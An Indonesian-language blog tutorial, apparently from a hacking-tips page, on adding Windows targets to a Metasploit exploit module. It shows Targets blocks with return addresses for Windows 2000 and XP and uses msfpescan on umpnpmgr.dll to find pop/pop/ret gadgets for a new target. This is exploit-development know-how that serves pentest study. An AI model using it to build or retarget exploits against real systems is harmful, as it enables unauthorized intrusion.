Mendefinisikan daftar target (nama, nomor, dan option).
Target harus dispesifikasikan dengan nomor ketika di lauching
'Targets' =>
[
# Windows 2000 – TARGET = 0
[
'Windows 2000 English',
{
'Rets' => [ 0x773242e0 ],
},
],
# Windows XP - TARGET = 1
[
'Windows XP English',
{
'Rets' => [ 0x7449bf1a ],
},
],
],
'DefaultTarget' => 0))
Block Target Option
ini disimbolkan dengan spesial name :
- Ret kependekan dari target.ret()
- 'Payload' overload exploit
Option, contoh:
- kembalian address Windows 2000
- 500 bytes untuk target Windows XP
- Windows Vista NX untuk bypass addressnya
Informasi Target
memasuki target menggunakan hash :
- target['padcount']
- target['Rets'][0]
- target['Payload']['BadChars']
- target['opnum']
Menambah dan Memfixkan target Exploit
contoh target kita adalah Windows 2000
untuk membuat address exploitnya adalah dengan menemukan file umpnpmgr.dll
ditabel terlihat :
'Windows 2000 SP0-SP4',
{
'Ret' => 0x767a38f6, # umpnpmgr.dll
}
Nah dengan acuan itu kita akan membuat exploit numbernya
root@bt4:/pentest/exploits/framework3# ./msfpescan -D -a 0x767a38f6 win2000sp4.umpnpmgr.dll
[win200sp4.umpnpmgr.dll]
0x767a38f6 5f5ec3558bec6aff68003c7a7668e427
00000000 5F pop edi
00000001 5E pop esi
00000002 C3 ret
00000003 55 push ebp
00000004 8BEC mov ebp,esp
00000006 6AFF push byte -0x1
00000008 68003C7A76 push 0x767a3c00
0000000D 68 db 0x68
0000000E E427 in al,0x27
kemudian kita menggunakan mesin msfpescan :
root@bt4:/pentest/exploits/framework3# ./msfpescan -p targetos.umpnpmgr.dll
[targetos.umpnpmgr.dll]
0x79001567 pop eax; pop esi; ret
0x79011e0b pop eax; pop esi; retn 0x0008
0x79012749 pop esi; pop ebp; retn 0x0010
0x7901285c pop edi; pop esi; retn 0x0004
Nah kita sudah menemukan nomor target
'Windows 2000 SP0-SP4 Russian Language',
{
'Ret' => 0x7901285c, # umpnpmgr.dll
}
»
Hack
» Tips Menentukan Berbagai Target Windows dengan Metasploit (cm115)
Silahkan Tulis Komentar Anda ...